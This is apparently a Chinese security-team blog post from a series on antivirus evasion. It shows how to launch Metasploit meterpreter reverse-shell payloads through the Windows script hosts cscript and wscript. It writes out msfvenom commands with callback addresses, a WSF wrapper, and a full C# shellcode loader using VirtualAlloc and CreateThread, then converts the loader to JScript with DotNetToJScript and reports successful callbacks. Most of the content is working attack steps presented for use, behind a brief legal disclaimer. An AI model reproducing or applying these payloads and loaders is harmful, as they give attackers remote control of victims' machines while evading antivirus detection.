远控免杀专题(62)-白名单CScript/WScript执行payload
2022-8-3 00:1:0 Author: 白帽子(查看原文) 阅读量:25 收藏

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


系统文件cscript.exe是存放在Windows系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要,Windows Script Host引擎在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。

wscript全称“Windows Scripting Host”,是一种批次语言/自动执行工具——它所对应的程序“wscript.exe”是一个脚本语言解释器,位于C:\WINDOWS\system32目录下,正是它才使得脚本可以被执行,就象执行批处理一样,可以拿来执行.wsh,.vbs,.js等。

WScript是一个窗口化的版本;CScript是一个命令行的版本。两种版本都可以运行任何脚本。二者之间的区别是,窗口化版本(WScript)使用一个弹出对话框来显示文本输出消息,而命令行版本(CSCript)通过命令行程序所见的、常规的“标准输出”方法来显示文本。

CScript/WScript可以用来执行vbs和js等脚本,是否能达到免杀的目的取决于执行的脚本本身的免杀能力。

使用msfvenom生成vbs脚本的反弹木马。

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 lport=4444 -f vbs > TIDE.vbs

使用cscript.exe执行生成的vbs脚本。

cscript.exe TIDE.vbs

反弹成功。

使用WScript.exe执行vbs反弹脚本,可以见到和cscript.exe相比命令行中没有文本输出信息。

WScript.exe TIDE.vbs

msf上线成功。 

wsf文件是一种windows脚本文件,是一个包含可扩展标记语言(XML)代码的文本文档。把msf生成的反弹vbs代码放入到<script>标签中。

<package><job  id="IncludeExample">     	<script language="VBScript">                               #vbs代码     	</script></job></package>

使用cscript.exe执行wsf脚本。

cscript.exe TIDE.wsf

反弹成功。

使用WScript.exe执行wsf脚本。

WScript.exe TIDE.wsf

msf上线成功。 

首先需要制作一个js反弹文件,和专题39方法一致。

1、生成基于csharp的shellcode, 我们要借助于 C# 来执行生成的 Payload,所以格式要选择为 csharp。

 msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f csharp LHOST=10.211.55.2 LPORT=3333 -o shell_x86.csharp

2、然后在vs2017中创建C#的Console⼯程,.Net版本建议2.0,这样兼容性好⼀一 些,如果选了了net 4.0。其他电脑上没有装4.0的话可能就没法运⾏了。代码如下,把 shell_x86.csharp 内容放到相应MsfPayload位置。

using System;using System.Threading;using System.Runtime.InteropServices;namespace MSFWrapper{    public class Program    {        public Program()        {           RunMSF();        }        public static void RunMSF()        {            byte[] MsfPayload = {            //Paste your Payload here        };            IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);            Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);            CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);            Thread.Sleep(2000);        }        public static void Main()        {        }        [DllImport("kernel32.dll")]        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);        [DllImport("kernel32.dll")]        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);    }}

然后将先前生成的 Payload 的黏贴到代码中注释为“//Paste your Payload here”的地方。保存代码后,修改该工程的属性,将输出类型改为“Windows 应用程序”,启动对象改为“MSFWrapper.Program”, 然后保存。增加 Release 版的 x86 编译对象,然后生成了ConsoleApp2.exe。

3、将exe转换为脚本⽂文件 下载 DotNetToJScript: https://raw.githubusercontent.com/TideSec/BypassAntiVi rus/master/tools/DotNetToJScript.zip

将上⾯⽣成的 ConsoleApp2.exe 复制到DotNetToJScript⽬目录下,执⾏命令生成TIDE.js文件

DotNetToJScript.exe -l=JScript -o=TIDE.js -c=MSFWrapper.Program ConsoleApp2.exe

使用cscript/WScript执行

cscript.exe  MSFWrapper.jsWScript.exe MSFWrapper.js

成功上线

cscript/WScript无论是加载vbs,还是wsf和js,都会被360和火绒查杀到,因此想要绕过杀软还需要对vbs,和js脚本进行免杀处理。

vt查杀率32/57 

六、参考资料

免杀 MSF Windows Payload 的方法与实践

E

N

D

guān

zhù

men

Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246241&idx=2&sn=0623352d62b7d8c02f99f6ec0c86b6fb&chksm=82ea57c8b59ddedeccb212f4c4d220b6bc1fee793795094faabbf57dbf8902ef9598c70c0a17#rd
如有侵权请联系:admin#unsafe.sh